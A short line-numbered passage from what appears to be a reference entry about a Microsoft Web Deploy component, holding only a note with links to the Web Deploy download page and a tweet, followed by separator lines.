1024 | 1025 | Notes: 1026 | Part of web deploy: 1027 | * https://www.iis.net/downloads/microsoft/web-deploy 1028 | 1029 | * Links: 1030 | * https://twitter.com/pabraeken/status/999090532839313408 1031 | 1032 | -------------------------------------------------------------------------- 1033 | --------------------------------------------------------------------------------